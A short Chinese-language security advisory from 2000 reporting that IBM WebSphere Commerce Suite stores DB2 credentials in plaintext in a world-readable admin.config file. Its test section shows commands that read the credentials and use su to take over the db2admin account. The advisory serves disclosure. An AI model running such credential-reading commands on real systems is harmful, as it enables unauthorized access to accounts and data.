IBM WCS存在一个本地用户越权访问安全问题发布时间:2000-12-27 更新时间:2000-12-27 严重程度:中 威胁程度:普通用户访问权限 错误类型:配置错误 利用方式:服务器模式 受影响系统 受影响系统:详细描述 China NetWork Security League(CNSL)发现IBM WCS存在一个本地用户越权访问安全问题!IBM WCS(Websphere Commerce Suite)是一套电子商务套件,配置安装完成后,会生成一个admin.config文件,里边明文存放了DB2数据库访问用户名及密码。(注:此文件权限为任意用户可读-rwxr-xr-x)这个问题可能造成本地用户越权访问系统,如果用户权限配置不当,有可能让入侵者获得系统最高权限! 测试代码 Examples for Sun OS 5.7 $find admin.config |grep admin.config /opt/WebSphere/AppServer/bin/admin.config $cd /opt/WebSphere/AppServer/bin/ $grep dbUser admin.config com.ibm.ejs.sm.adminServer.dbUser=db2admin $grep dbPassword admin.config com.ibm.ejs.sm.adminServer.dbUser=ibmdb2 $su - db2admin password:ibmdb2 $id uid=db2adminID(db2admin) Examples for WIN2000: d:\waserver\bin\>more admin.config com.ibm.ejs.sm.adminServer.dbUser=ad2admin com.ibm.ejs.sm.adminServer.dbPassword=ad2admin ... 解决方案 尚无 相关信息 |
